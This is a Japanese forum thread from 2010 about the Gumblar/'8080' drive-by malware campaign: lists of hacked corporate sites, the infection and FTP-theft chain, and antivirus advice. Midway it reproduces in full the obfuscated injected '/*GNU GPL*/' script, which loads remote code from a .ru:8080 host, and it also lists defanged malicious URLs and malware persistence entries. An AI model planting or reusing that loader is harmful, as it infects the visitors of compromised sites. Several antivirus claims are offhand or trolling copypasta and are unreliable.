ホンダもやられてたのね

>ホンダもやられてたのね
何をいまさら…。

JR東日本 ttp://www.jreast.co.jp/apology/20091223_restart.html
本田技研 ttp://www.honda.co.jp/oshirase/
モロゾフ ttp://www.morozoff.co.jp/_cms_/news_item/detail/item00085.html
信越放送 ttp://www.sbc21.co.jp/notice/notice091227.html
デジタルマガジン ttp://digimaga.net/2009/12/about-infection-to-the-gumblar-virus.html
アニたまどっとコム(ラジオ関西) 告知消失

エロサイト徘徊している俺は確実にアウトなんだろうな・・・・・・
AVGフリー、Ad-Aware、spybotしか使っていない俺はどうしたらいいのでしょうか？

AVGフリーでも反応するぞ

精度は決して高くはないがフリーならまだavastの方がいいぞ

蔓延具合やばいな
次は辻ブログか
どこまで感染が広まるやら

win.jpgって63バイトなんだけど、
これで感染させることができるの？

エスパーさんは先程お眠りになられました

>>335
無理。つかwin.jpgは関係ない。

嘘言うなよ
分からないなら黙ってろ

/*GNU GPL*/のスクリプト解読してみたけどさ
解読して出てきたURL先のものをjavascriptだぞと
というのは記述してるわけ

で今のウィルスってjavascriptで読み込ませたとしても
悪さするプログラムって実行できるわけ？
そもそも勝手なプログラムの実行はvistaだと防げるわけだし

やっぱりアドビの0-dayでアップデートに紛れ込んで
FTPを盗むプログラムを実行したと思われる
だから今のところ/*GNU GPL*/のスクリプト読んでも無害なんじゃね

詳しい人どう思う？

>>334
頭のjsがやられてるからハロプロ全体のような希ガス
tp://knnn4321●chips●jp/js/prototype●js
↓
/*GNU GPL*/ try{window.onload

>悪さするプログラムって実行できるわけ？
それが出来ちゃう脆弱性を利用してるわけ
vistaでも実行は可能だがUACオンだとスタートアップに登録可能かどうかは知らない

それに例えスタートアップに登録できなくても
実行できちゃえば
再起動までは攻撃は有効だと思う

>>339
というか基本的なことを分かってない
このスレ読んだだけでももう少し分かるだろ

>>339
何度も言われていると思うが
モロゾフのやつは
Microsoft Video ActiveX コントロールの脆弱性
Adobe Reader/Acrobatの脆弱性
Sun Javaの脆弱性
の三つの脆弱性のどれかが使われる

つまり/*GNU GPL*/を読み込むと
Microsoft Video ActiveX コントロールの脆弱性
Adobe Reader/Acrobatの脆弱性
Sun Javaの脆弱性
このどれかをついてプログラムが実行されちゃうってこと？

そういうこと

>>335,337
win.jpgは脆弱性を突いてクラッシュさせるのが役目で、そいつだけじゃ感染しない。
そいつを読み込ませるJavaScript側でshellコードを生成し、メモリー内にまき散らしておいて
クラッシュ -> shellコード実行 -> ウイルス本体召喚 -> ざまあ！

ってかさ、AVG、Avast、MSEssentialsって入れると互いに競合しないの？
一時のAd-AwareとSpyBotみたいに
ウイルスソフトって入れまくってもいいの？

Avast+MSEは競合しないよ
http://pc11.2ch.net/test/read.cgi/sec/1261930389/357-375

俺AVGツールバーってのインストールしてるんだけど、これの安全性：完全ってサイト使ってれば大丈夫なんだろうか？
今回のGumblarってXXSだろうけど、となるとツールバーに危険と表示される間もなくホンダなどのサイトでは安全性：完全ってなるんだろうか？
ホンダとか感染したサイト行く勇気は無いんですが、このツールバーでGumblarを予防できるものなんでしょうか？
もし出来なきゃこのツールバーなんの意味があるのかなと思ったりもしますが・・・

Java Runtime Environmentて別に使わなかったらアンインストールしたほうほうが無難？

昨日深夜に
adsrevenue-net.king.com.newgrounds-com.themobilewindow●ru:8080/pics/win.jpg
からの侵入をノートンが遮断したログが残ってるんですけどこれってなに？
2chを閲覧してたら誘導されたってことかな？

今のところ個人のサイトやブログでは見つかってないんだね。
自分のブログも一応、確認しよう・・・

>>352

>>1よめ

>354
twintailが
HTTP MS MPEG2TuneRequestControl ActiveX BO 2 をと書いてあったので
2chの閲覧が原因かと思ったのですがね。

2日前に踏んだのを、TELNETで入って解析してみたら

sciencedirect-com.lequipe.fr.gamestop-com.superore●ru:8080/verycd.com/verycd.com/google.com/zaobao.com/rakuten.co.jp/

を経由して

ks369871●kimsufi●com:8080

から.jsファイルをダウンロードしようとしていた。だた、このファイルがダウンロードできなかったので助かったようだ。

pdfはレポートとかで使うからなー消したいのに消せないもどかしさ

>>352
そのURLはこのスレの76で直リンされてて
俺の場合、専ブラで画像を自動サムネイルするようにしてるので
専ブラがアクセスしたらAvastのネットワークシールドが遮断した

>>358
76を見ただけでノートンが遮断しました。
原因が解ってほっとしました。　有り難うございます。

>>356
507 名前：名無しさん＠お腹いっぱい。 投稿日：2010/01/05(火) 00:45:49 ID:zAbuPfRw0
砂箱に入れたFirefoxからFirebugで色々見てみたけど
呼び出される本体のjsファイルがNot foundで発火しないね

508 名前：名無しさん＠お腹いっぱい。 投稿日：2010/01/05(火) 00:55:20 ID:qZhWCv8d0
アクセス制御で2回目以降は404を装う。

509 名前：名無しさん＠お腹いっぱい。 投稿日：2010/01/05(火) 01:13:20 ID:zAbuPfRw0
串さしてやったら死んだわ・・・
やばいな

>>360
まじかー！

76の攻撃側のアドレスって侵入を試みる度に変わるねえ。

>>361
gumblarの頃からそういうアクセス制御は入ってるよ。
gumblar.xでは2段構成のうちリダイレクト先(ウイルスばら撒き側)は
陥落サイト群の中からPHPが動作しているサイトが選別されていた。

win.jpg
http://www.virustotal.com/jp/analisis/a58e3a42daf56fa95d67a157b9c699e43e89e254bcc717ff04d9d19d1ffb40b4-1262708521
対応済み：Avira・Kaspersky・McAfee・NOD32・Panda・Symantec etc

JavaGame.jar
http://www.virustotal.com/jp/analisis/64b9d4cf390e37a1017b8a585917c0d21c476cdd59193cc3b28fe46861ffd921-1262708821
対応済み：Avira・MSE・Symantec・TrendMicro etc

gumblarに犯されている情報の、最新のサイト名（リンクは要らないです）誰か教えてくれませんか？

対策ソフトを集めてマルウェアの性能テストをしている者です。
PC雑誌の熟読には自信があります。

>通称GENOウイルスに強いかどうか、

ええ、強い方ですけど。

基本的にGENOだろうと何だろうと今はもう何らかの悪意を持つプログラムや
スクリプトを総称してマルウェアと呼んでいます。昔からの名残で説明の便宜上
使うとかその程度の意味しかないです。

私のこれまでの経験から言うとすれば、Kaspersky Internet Security 2010が最もおすすめです。
2010ではBehavior BlockerやHIPSに加えて仮想実行スペースも搭載されたのでGumblar
(日本の通称ではGENOウイルス)パターンでもバッチリ防げます。

釣り針でかすぎるぞｗ

Heur.Win32.Generic.v
て言うウイルスが２回も・・・・

大規模流行は大手どこならどこも対応するからどれでも一緒だよ。

>>364
対応早くなったかな？

「拡張子ではなく、内容によってファイルを開く」という設定がIEでは標準有効だからなぁ・・・

変えればいいだけ

なにまた火狐野郎がなんかいっちゃてんのか

あたいはopera使いちゃん！

http://tsushima.2ch.net/test/read.cgi/news/1262766483/

VirtuaBoxにインストールしたWindows XP SP3でwin.jpgを踏んだら
いつの間にか悪名高いSecurity Toolがインストールされてたｗ
もう少し遊んでみよう

>>364
avast!はコード自体をwebシールドで弾くから無問題。

Firefox更新きたな

しらん

<script>
/*GNU GPL*/
try{window.onload = function(){var U26gcel3nnek = document.createElement('s@$$&c)$&r$i#(p#$!t!!('.replace(/@|\)|\!|\(|\^|\$|&|#/ig, ''));
var Zavq7z4z78k = 'Imrp1rhevfo';
U26gcel3nnek.setAttribute('type', 't(^$e&@&x!!$t!@&/)j((a)v&&a@(^s(!c((r!i$!p!$t!(#'.replace(/\^|#|&|\!|\(|\$|\)|@/ig, ''));
U26gcel3nnek.setAttribute('src', 'h())&t)t$$p@#:)^$)/((^/!$#g!o(&&u^^^g!$o？u!-$&c!)!o)^$$m)@!^.$(#n&)$i
#(n^#^g@.&@c&$#o@m(.)a###!c#(e!$$(r$$-^#c!@o)@!$m@.$^s)(u!@p$$e@r@(a(g(@^u)$&)!i#d!e&!!#.!@^r(^u^:)
#8&^#&0#(8)^0^/!!#i@$)#n^$@$.&!)!c&!(o((!m$&&/$i#!$n#!).)$@c#(^o@!$&m(@/@$g@o))o^&g@&l!#e!.^)c))o@
m#&@/$^#v#)i!)#d!^@e&)$)o@)!@@s#z$(.？^c@!$o!m(^^/@b^(&e#!@&s@((t)#$@#t&^)^u&b!(e^)c$^#l!@)i$)&!$p)
@s!$^$(.&$c@&)@o)!$m(^#&/('.replace(/\!|@|#|\$|\(|&|\^|\)/ig, ''));
U26gcel3nnek.setAttribute('defer', 'd!$@$e@f!!(&(e^r@)'.replace(/@|\(|\$|#|\!|\)|\^|&/ig, ''));
U26gcel3nnek.setAttribute('id', 'M$e!$7#!)r#!$l？@^9()!(#t$!^9&q#)@$$b&&^!3&@)'.replace(/\^|\)|@|&|\$|\!|\(|#/ig, ''));
document.body.appendChild(U26gcel3nnek);}}
catch(Lpmpa57y1j) {}
</script>
<!--86fa61201e3ca3a075145a1d33d3c209-->

思いっきり踏みました

http://up3.viploader.net/ippan/src/vlippan053227.png
ソース


どちらさまかWindows7の感染確認方法を教えていただける方はいらっしゃいませんでしょうか

MSに電話白や

>>360
これって、もしかして同じLANから見たら、一人目しか感染しないってことか？

GENOウイルス感染　ローソン
http://tsushima.2ch.net/test/read.cgi/news/1262766483/l50

>>382
んなもんないからとっととOSいれなおせ

>>386
えっ

いまノートン先生が0v3exclv.exeを削除してくれました

やっぱりUACはスルーするのか

>>387
それだけかどうかわからないよ

京王電鉄ＨＰも改ざん被害　ウイルス「ガンブラー」
http://tsushima.2ch.net/test/read.cgi/news/1262784863/

>>387
firefoxにはnoscript入れてなかったの？
それとも入れた結果がこれだyoってこと？

UACスルーってマジかよ、何のための暗転だよ

http://pc11.2ch.net/test/read.cgi/pc/1261006089/

海外ではあんま騒いでないよな
なんだこの差は

>>394
"セキュリティツール"の画面が出てくるって騒ぎになっていると聞いたような。
具体的な場所は分からないけど。

これ、もしかして制限ユーザだと全く感染しない？

>>395
Security Toolな。
これも改ざんされたサイトを閲覧して、脆弱性を利用して感染するらしい

サイト www.spacecraft.co.jp/home.html の調査結果
検出されたウイルス（ワーム、スパイウエア）
Trojan-Downloader.JS.Agent.ewh

>>398
そのウィルスはつい最近まで、GDATAの誤検出だとずっと思ってた。

↓↓↓
ｈttps://www●global2j-education●com/contact
↑↑↑

ｈttpsが、、、

世界中のHTMLのソースコードを検索できたら回避できるのにね
グーグル辺りがやってくれないかな・・・・

ＦＴＰがやられるんだからｈttpsとか関係ないよ

32 名前： すり鉢(アラバマ州) 投稿日： 2010/01/07(木) 00:45:39.79 ID:RXPRsCkB
p://www●spacecraft●co●jp/home●html
スペースクラフトグループ
神田うの、黒谷友香、栗山千明、岩田さゆり、青山倫子、宇浦冴香、等が所属。

ガンブラーｷﾀ━(ﾟ∀ﾟ)━!!

私は対策ソフトを集めてマルウェアの性能テストなどをしています。
PC雑誌の熟読には自信があります。

あなた方には高度な話になりますが、最近のクラッカーは対策ソフトの
利用を予め想定していて、これを回避するようにいろいろ画策してきます。
今ではアンチウイルスの回避なんて簡単にできるようになっていますし、
Personal Firewallもバイパスできる場合も結構あります。

ここの閲覧者の方々も含めて申しますけど、ここ最近は対策ソフト
回避技術が非常に進歩してきましたので、機関系テストでNo.1の
ソフトだからとかそんな簡単な話ではなくなっています。

私の豊富なテストと経験からすればKaspersky Internet Security 2010が最もおすすめです。
2010ではBehavior BlockerやHIPSに加えて仮想実行スペースも搭載されたのでGumblar
(日本の通称ではGENOウイルス)パターンでもバッチリ防げます。

コピペ乙

年明けにgoonetの輸入車ページ見てたらなんか変になったけど大丈夫だったのかな…

民主党サイトが年末から年始にかけて改ざん - 政治的意図なし
カゴヤのホスティングサーバが不正アクセス被害 - ウェブアプリの脆弱性狙われる
関連7サイトが改ざん被害、閲覧でウイルス感染のおそれ - 出版文化社
通販サイトなど運営する3サイトで改ざんが発生 - 岐阜の恵那バッテリー電装

詳しくない者だが、経緯を書いておく。

年末にあるサイトを見たら、瞬間的にいくつ窓が開き、Acrobat6が自動起動。
そして固まる。PCを強制再起動。

再起動すると、Antivirに反応するファイルがゾロゾロすごい数でてくる。名前
はまともらしいが、ほぼすべて削除。いくつかもらしたかも。

次の日に再起動しても、また反応ファイルがぞろぞろ。このあたりで難しいウイルス
かも？と気がついて、とにかく反応するものをすべて削除。TV番組表自動取得
のためのものも、削除してしまった。

その後、スキャンにひっかかるものはテンポラリファイルにある実行ファイル
だけになる。簡単に削除。しかし、siszyd32.exeについては「ファイルが開けない」
という警告のみでる。一旦安心。

Spybotでも、siszyd32.exeはひっかからず。WEBで調べてヤバそうなものだと
判明するが、ファイル本体がどうしても見えない。隠しファイルを表示にしても、
見えない。ただ、存在が指摘されたフォルダで、
siszyd32.exeフォルダを作成するとできないことから、やはり存在する
ことが判明。

ググッてみたけれど、有効策が見つからず。レジストリの中に見つからず、
カスペのフリーツールはデータベースが壊れていると出てつかえなかった。
また、何もしていなくてもCPU使用率が５０％になっていることに気がついた。
不審なプログラム、プロセスは自分の知識ではみあたらず。

今日になって、いろいろ削除方法を探してみたところ、セーフモードで起動
するとうまく削除できるらしいので、試してみた。すると、
\プログラム\スタートアップ\siszyd32.exe　が何もしなくてもはっきり
見えていたので、削除して再起動したところ、CPU使用率が５％くらいに
落ちた。多分、解決。

今は、siszyd32.exeがCPUをあんなに使用して何をしていたのかが気になって
いる。サイトの運営はしていないが、どうしたらいいものか・・・。ヤフー
とかのパスを変更した方がいいのかな。

>>409
OSのクリーンインストールを薦める
面倒だとは思うが、やっておいたほうが絶対にいいぞ

>410 ありがとう。でも、忙しくて。XPなんで、クリーンインストール
するくらいなら、新しいPCを７で自作しようか検討中。

自分はウイルスやファイアーウォールに詳しくないので、これを機に勉強
しようと思ってます。

今回のウイルスは８，９年くらい前に大流行したウイルスを思い起こさせ
ますね。これを機にセキュリーティーが強化されたはずなのに、こんなに
あっさり感染するとは・・・。WEBを見ただけで感染というのは問題が
ありすぎる。自分の周りはもっとPCに疎い人ばかりなので、明日は職場で
大変だ。

水面下への広がりと応用力を考慮すると、まだ氷山の一角に過ぎず
ネット史上最悪のウィルスとなり得る可能性があるな
事の始まりは去年の春辺りだったか
そこから、表面上に出てくるまで一気に広がり始めた印象

/*GNU GPL*/ 感染サイトを見る
↓
Adobe Readerを最新版に更新してないと
脆弱性をつかれてウィルス実行される
↓
FTPのID、パスがあれば盗まれる
というか盗んで送信するプログラムが常駐される
↓
盗まれたFTPのID、パスでサイトを改ざん
↓
ループ

GNU GPLに関しては、Adobe Readerを入れてなければ感染は防げるとみていいのかな？

Adobe Readerだけじゃないよ
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2108

基本、JSは信頼サイト以外は止めてるが･･･大手の有名サイトでも感染する事があるから100%安全じゃないだろうな
未知のセキュリティホールを突かれない事を祈るばかり

> 未知のセキュリティホールを突かれない事を祈るばかり

それを考えるとHIPS入れておく方がいいのかね

こんなに多くのサイトがやられるんじゃ
市販のウィルスソフトなんか役に立たないと
ばれちゃうなｗ

ウイルス対策ソフトは検体が無いと対策は取れないからねえ
まあ、これは現実世界のウイルスでも同じだけど

UAC→スルー？？
ウィルスソフト→定義更新が間に合わない
各ソフトウェアを最新の状態にしておく→現状ではこれが無難
javascriptを無効化する→ブラウジングに支障が出る

頻繁にブラウジングする立場（様々なオンラインショップで購入したりもする）としては若干怖い

バックアップとれば万が一の時はクリーンインスコで済むから現実のウィルスほど
脅威には感じないけどね（仕事関連は別だけど）

専ブラで2chだけを見るネット生活を送るのがベストか

ガンプラでジオマラでも作ってろチンカスｗ

そういや専ブラの脆弱性発見ってのも以前あったよな・・・
まあ日本をピンポイントに突いてくる奴しか見つけても使わないだろうけどｗ
専ブラによっちゃIEの脆弱性の影響受ける奴あるのかな？

>>376,395,397
Security Toolに関してはこれだね
ttp://blogs.yahoo.co.jp/noooo_spam/59325476.html
ttp://blogs.yahoo.co.jp/noooo_spam/59347678.html

8080のスクリプトがこいつらに変わってるとこもあるとか
8080を操ってる奴らは、裏市場でボットネットみたいな販売方法使って儲け始めたんだろうか？

うちはLive2chだからIEエンジンを使うけどIE自体を凍結しているから実害はないかな

9999999円あなたはどしますか？
tp://117117●fc2web●com/

これはGNU GPLぐっじょぶw･･で宜しいのかな？

感染すると以下の二つが登録される

C:\Documents and Settings\ユーザー名\スタート メニュー\プログラム\siszyd32.exe

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"sysgif32"="C:\\WINDOWS\\TEMP\\~TMD.tmp"

そこは固定じゃない。バイナリはコロコロ変わる。

ころころなんて変わらないよ

モロゾフなどが感染した今流行のやつはそれだろ
新たな違う攻撃なら変わるだろうけど
コロコロ変わったところは確認してない

>>428
どう変わった？

GENOの頃はVistaは安全だったのに、もうVistaでも関係ないんだな。

モロゾフのタイプは>>427であってる
ころころ変わるのは別物

感染しているのはupdateを怠ってる人達だがね

updateを怠ってるなんて出来るの？
終了時に強制的にupdateされない？

flashとかがか
今の段階でそんなこといってたらそら引っかかるわ

>>384
俺もそれ知りたい。

月曜の晩、俺のPCでNOD32が8080系を検知したサイトを、奥さんが別PCで見ちゃったの。ウィスルセキュリティーZEROはスルー。
でも、どんなに調べても感染の形跡がないのさ。
その後、各社（Macfee,NOD2,MSE,Kasper）の全スキャンにも引っかからず、netstat -a で見てももどこにもつなぎに行ってない。
Windows XPは Windows Updateで最新状態だったが、Acrobatは8だったのに。

で、>>356や>>360を見て、もしかしてNOD32は改竄されたHTMLの<script>の文字列パターンや .ru:8080 のサイト名ではなく、
その次の .jsファイルのダウンロードの時点で検知・遮断するのかなと。
すると、次に奥さんが別PCで見ても.jsファイルがNOT FOUNDなら感染しなかったのも合点がいくんだなぁ。

いずれにしても早く、明確な感染確認の方法が出てくれればありがたい。
いっそFFFTPをインストールして、自前サイトのID/PWでもセットしておくかなw

Spybot、Ad-Aware、Avast、MSEssentialsの４つをインストール（常駐）＋MSの悪意のある〜を使ってますが、こういうフリーのソフトで固めてもGumblarは防げないのでしょうか？

だから穴の前のついたてを選んでないで
さっさと穴埋めとけ

今、一番いいセキュリティソフトスレに行こうとしたらAvastがトロイの木馬を発見した
一応未然に防いで削除（移動）出来たようだけど、ほんとに大丈夫なのかな？
たった今１日がかりでWindowsのクリーンインストールしたばっかなんだけど

やっぱ2chは怖いね
どのスレだったかCファイル破壊コードとか書かれていたし

ふーん

>>442のような人間が仕込んでるんだろうなｗ

また馬鹿キャラプレイしてるのか

cファイル破壊コードって何なのさ？

2chスレ内だけで感染できるなら感染してみろや

>>446
自分Live2ch使ってるんですが、そのスレ見たらAvastが検出して、その後Avastの履歴見たらLive2chが書かれていました
自分も良く分からないのですが
誤検出ですかね？

どんだけー

検出と感染は違うだろ。
検出に誤検出もなにもない。

2chでJS:Redirector-H [Trj]ならAvastの誤検出

>>449
誤検出はあるだろ

すまん。誤検出はあるな。検出がない。

俺初心者でこのスレ読んで思ったんだけど、2chのスレ見ただけでトロイの木馬って感染するんですか？
今話題のGumblarってのはサイトを見ただけで感染するようですが

誰かここに癌ブラーのソース貼り付けてたよね
うつったかも

今日は釣り日和なんか？

２ちゃんに繋ぐFTPアカ持ってる人が踏んで、このページが書き変えられれば感染するんじゃね？

私は対策ソフトを集めてマルウェアの性能テストなどをしています。
PC雑誌の熟読には自信があります。

私の豊富なテストと経験からすればKaspersky Internet Security 2010が最もおすすめです。
2010ではBehavior BlockerやHIPSに加えて仮想実行スペースも搭載されたのでGumblar
(日本の通称ではGENOウイルス)パターンでもバッチリ防げます。

コピペ乙

経験豊富なあなたがお勧めする

　Kaspersky Internet Security 2010

これは、買わないといけないね！

AVGは検出してくれないのか？

俺もAVG使ってるんだけど、どうなのか不安なんだよね

ココで合ってる？

http://pc11.2ch.net/linux/ > GZ > file.htm JS/TrojanDownloader.Agent.NRL トロイの木馬

/*GNU GPL*/とか 呼びにくい
まだ名前ないのか？

JRウイルス

ハウス食品　『　お客様のPCにウィルスを感染させてしまったかも・・・　』
http://tsushima.2ch.net/test/read.cgi/news/1262843094/
>弊社の「採用ホームページ」が第三者による不正アクセスにより改ざんされ、
〜
>２．対象期間
>2009年12月15日 1:00　〜　2010年1月5日 15:00
ローソンと一緒か

他所は大変だね。
わたしのとこは絶対大丈夫！　うぇぇｗｗｗｗWw

え〜と
どれどれ　

/*GNU GPL*/　・・・　(°◇°;)

何で新卒採用情報ページばかり？
偶然？

新卒ディレクトリしか入れないFTPアカ持ってるヤツが踏んだんじゃね？

時期的な事情があったりして？

家で更新してんのか

>>447
画像系の直リンにセキュリティソフトが反応しているｄけで
専ブラという箱庭世界内ではスレに貼られている有害リンクを直接踏んでWEBブラウザで開かない限りは
120%感染はあり得ません
janeやIE系のlive2chはもちろん、全ての2chブラウザに共通

2chブラウザに脆弱性なしということですか？

いや
あったとしても利用されてない

2chのスレを見るだけなら2ch自体が感染しない限りwebブラウザでも同じ
反応するのはコードのコピペ
後は画像サムネイル機能を持った外部ページからの経由ではこれに反応するかもしれないって程度

ここにコード貼り付けた馬鹿がいるから

コード貼りつけたからって馬鹿とかいうなよ
リンク貼るヤツより遥かにマシ

比べてどうするんだよｗ
どっちも糞で馬鹿なのには違いない。

>>467-469
某大学のHP陥落が関係していると思われ。

不況のあおりですか。
サイバーテロですね。

どっかでVistaは関係ねーとかかかったらPCぶっ壊れてすぐわかるとか言われてたけど
結局どうなのこのGENOだかGumblarだか言うウィルスって

結局誰も何も分かっていない

無償ツールで「Gumblarウイルス」チェックを 〜 セキュアブレインが呼びかけ
セキュアブレインの先端技術研究所の調査によれば、
2009年度第2四半期（2009年7月〜9月）と
第3四半期（2009年10月〜12月）を比較すると、
「Gumblarウイルス」によるWebサイトの改ざん被害の件数は、
約4倍の上昇となっている。
12月に発見された「Gumblarウイルス」によって
改ざんされたWebサイト336件のうち、127件（37.8％）の被害サイトは、
企業のWebサイトとの情報もある。
http://www.rbbtoday.com/news/20100107/64816.html
途中の文を切ってますがかなり増えてるみたいですね。

>>480
ガンブラーウイルスについての誤った情報にご注意ください。
ttp://blogs.yahoo.co.jp/noooo_spam/59368027.html

8080なんて呼んでんのはGENOスレにいるやつだけだろ

Ｇｕｍｂｌａｒ感染してないか確認する方法は、GENOと同じ？

これって新Gumblar？
tp://break24●nl/
＜/head＞＜script language=javascript＞＜!--
〜中略〜
POF=unescape（f5DJz）；eval（POF）｝）（/&/g）；
--＞＜/script＞
＜body＞

違うと思う

>>486
それは豚汁

>>484
あんたに聞きたい
なぜ8080と呼称するのをそこまで嫌がるの？
Gumblarと明確に違うものなのだから便宜上8080って呼んでも良いじゃないの

ってかマスコミがGumblarって名で広め過ぎてて各個人ブログもちょっと混乱気味・・・

8080なんて呼んでるやつはごく一部だけって話だろ
ポートじゃわかりにくいし勘違いするやつもいるだろうしな

>>484
早く正式名称決めないとヤバイと思うよ、これ。
今回広範囲に被害が広がったのは、GENOと同じ物だと思って対策してなかった人も多いと思う。
対策方法が違うし、とりあえず8080でいいんじゃないの？

gumblar亜種ってことで良いだろ
くだらねえことでこだわるなよ

>>490
今のところ発見当初から変わってない特徴が8080ポート指定ってとこなんだから、別に問題ないと思うけど？
どんな勘違いするんだ？？
スクリプトなり仕込んでくる実行ファイルは変化してるし、「GNU GPL」は「CODE1」に変化した経歴があるし・・・

>>492
Gumblar直系の亜種としてGumblar.xってのがあるんだよ
そこに8080が食い込んできたからこのスレがGENOスレ発祥で出来たんだけど、マスコミがGumblarで統一しちゃったせいで
あっちのスレにも8080の改竄報告がいったりしてる

ru指定か？
ちがったっけ
そうならruでもいいな
ロシアンガンブラーでいいよ

>>494
だからなんだよ
しつけえな
くだらねえ

>>494
別に亜種は複数合っても良いんだよ
似たような種類だし分かりやすくて良いよ
まあ有名どころのベンダーが適当に付けた名前が定着するだろうけど

テンプレで8080系ってなってるだろ
嫌ならGENOスレでやってくれ

単にテンプレ作ったやつが馬鹿だからだろ
8080なんて普通に使うポート
無知なだけ

8080系ってことはガンブラーの8080系って言いたいんだろ？

呼び名なんて分かれば良いんだよ
世間でガンブラーらなそれで良いだろ
間違いとか言うなよ

＞世間でガンブラーらなそれで良いだろ
良くないから感染が広がったんじゃないかと

Gumblar8080とかかっこよくね？

分かればGumblarでもGENOでもなんでもいいよ
でも今のこのごちゃ混ぜ状態で何が起こってるかって言ったら、8080で感染したのにGumblarってだけでGENOウイルスチェッカーが
未だに使えると思ってる奴が居たり、初代Gumblar(GENOとよく言われた奴)の感染確認方法で確認できると思ってる奴が居たり・・・

どっかベンダーが改めて名前つけてくれたら良いのに・・・ベンダー共通の名前つけよう云々ってどうなったんだ

しかし目的はなんなのかね
ウェブ改竄の被害を楽しんでるだけかな

>>504
8080で詐欺紛いもやってるみたいだけどね>>424
まあコード書き換えれば感染PCをボットネット化するようなこともできるだろうし、金にしようと思えばどうにでもなるな

GumblarもそうだがゾンビPC化すると
DOS攻撃やらなにやらでサイバーテロも起こせるだろ？
金になるとしてもかなり危険だと思うがな

この手のウィルスって亜種が作りやすいだろうから、なんか切りがないよな

切りがないけど、アンチウイルスソフトじゃ対応が一歩遅い気がする
ブラウザで判定できたらいいのにっておもう

ブラウザで判定する意義が分からん・・・結局ウイルス対策ソフトでやってることと一緒じゃね？
そんなことより、使ってるソフトのアップデートを的確にやって既知の脆弱性を埋める&最新のウイルス対策ソフトの常駐の徹底が
一番効果的かと

ブラウザで判定すると早くなるのか？
そんなこと無いから同じ

もうJavaScript切っとけ

別にJavaScript自体が悪いって訳じゃないけど、ホワイトリスト形式で使った方が賢明な状況だよね
で、この流れでNoScriptの話題に振ると、暴れる粘着が居るという・・・
まあなんだ、IEなら信頼済みサイトゾーンの有効活用、FirefoxならNoScript導入、Operaならサーバーマネージャ使うか
No More Scriptsっていうブックマークレット使うか・・・こんな書き方で良い？ｗ

アップデートの徹底がいいのは当然だけど、（ブラウザに定義をカスタマイズできるようにして）
jsの内容が難読処理されてたら、実行しないとか、中国ロシアのサイトに飛ばす内容は実行しないとか
ウイルスソフトの判定の前にブラウザで判定できたら、2段ガマエになって、よりいいんじゃないかと思っただけ。
ウイルスソフトに任せきりが嫌なんだよ。どこまでちゃんと見てるかわかりづらいから。

ウイルスソフトに任せちゃ駄目だよねｗ

アドビ製品は強制アップデートでおｋ

>>513
そんな機能ブラウザに標準搭載したら、正常なサイトまで表示崩れたり、真っ白ってことになりかねんか？
外部の奴がアドオンで作るならまだ現実味があるが、ブラウザベンダー自体が付けるような機能には思えん

そこまで心配なら、真っ新な状態の仮想化環境でブラウジングがお勧め

真っ新なマッシン

>>516
ブラウザベンダーがつけてこそ、そのブラウザの信用やシェアが上がったりしないかな。
まあ現実的ではないと思うけど

>>518
逆に否定意見が結構集まる気がするｗ
まあ最新バージョンのブラウザはどこもフィッシング対策との名目で何かしらのフィルタリング機能入ってるから、そこに期待するしかないんじゃ
ないかな
と言っても、実際改竄されてるページをブロックできてたり、対応が早いかっていうと・・・

結局は環境を常に最新に、ウイルス対策ソフトも最新に(ただし過信は禁物)ってとこに落ち着く

ウイルスが先かウイルスソフトが先かという命題と同じ
Web改鼠は結果でしかなくて、インターネットの開発者は皆どこかしらの違法結社に属していて
ウイルス漬けにされているという現実が露呈した格好だ

なんだか楽天トラベルおかしい？

アメーバがやられた
ブログパーツを使ったサイトで改ざんされたらしい
流出事件といいこのサイトはだめぽ

ハスクバーナ・ゼノアのHPもGENOに感染してない？
ttp://www.zenoah.co.jp/

アメバが駄目なんてずっと前から言われてるよ

>523
ノートン先生に怒られた

>>523

Kaspersky
Internet Security 2010
アクセスが禁止されました
要求されたURLのWebページを表示できません

URL:

http://www.zenoah.co.jp/

このWebページはウイルスに感染しています

次のウイルスが見つかりました: Trojan-Downloader.JS.Agent.ewh

情報:
23:55:06
Kaspersky Internet Security 2010

> Trojan-Downloader.JS.Agent.ewh
いつものだね

だから>>1ぐらい読めよ・・・・

＊＊＊ 危険なサイトのアドレスはそのまま貼らないで「.」を「●」に変えてください ＊＊＊


危険かもしれないってアドレスも含むぞ

>>523
アバストﾀﾝにも怒られた

お前らよく平気で踏めるな。

だいたい仮想環境で踏んでるんだろ
アホもいるだろうけど

自信があるならドンドン踏むことをオススメする、それが漢だ

自己責任だけどね

一応view-source:使ったけどそれでも怒られた
オンラインソースチェッカーがなくなったのが辛い

>>530

バーチャルなら余裕だべ

そろそろニュースでも扱われるようになってきたし
これを機にネットは怖いという意識が強くなって90年代半ばくらいのネット人口に戻ったりしないものか

しかし.ruばっかだな

別に感染してもたいしたことないしな
それほど怖くもないだろ

cnとruを遮断すればかなり安全になるしな

ならないだろうな、無関心な奴は大して気にしなさそうだしニュースで扱われても
一部の人間が騒ぐことになるだけ

mixiとかが感染媒体になれば大騒ぎになるだろうけど携帯メインの層は気にもとめないだろう

サイバーエージェントとノートンの「ノートン警察」閲覧者にトロイの木馬感染のおそれ
http://tsushima.2ch.net/test/read.cgi/news/1262865452/ 　

>>523
/*LGPL*/
ちょっと変わってるぞ

>>529
あれ？　こっちでは反応ない

>>541
スクリプトにはどこも反応しないみたいだね
ttp://www.virustotal.com/jp/analisis/9e032adbec239b778cd4e14405953799185c6c7f1f35fe90531c944efc2f0787-1262880649

もう一ヶ所/*LGPL*/になっている所をみつけた
新型スクリプトみたいだな
検出できるのはノートンの侵入検知くらいかも
avast!にはスクリプトの検体を提出しておこう

>>541
えっ
さっきトロイがどうとかいいながら発狂して何かを遮断したんだが

>>544
標準シールドとWebシールド(高)で使っているんだが
時間差で書き換えられたか？
定義データも手動で更新して100107-0の最新のはず
スクリプトは提出しておいた

貼られた直後に飛び先のチェックでソース見たときは/*GNU GPL*/だったような・・・
まったく確証のない俺の記憶だが、もしかしたら推測通りこの数分・数時間の間に書き換えられたのかも

Amebaのブログパーツ「ノートン警察」閲覧者にトロイの木馬感染のおそれ
http://www.itmedia.co.jp/news/articles/1001/07/news092.html

12月26日午後11時15分、委託先の制作会社が運営管理するブログパーツのサーバが不正アクセスを受け、
プログラムを改ざんされたという。ユーザーからの情報と委託先からの報告で改ざんが発覚。1月6日に
ブログパーツをすべて削除した。

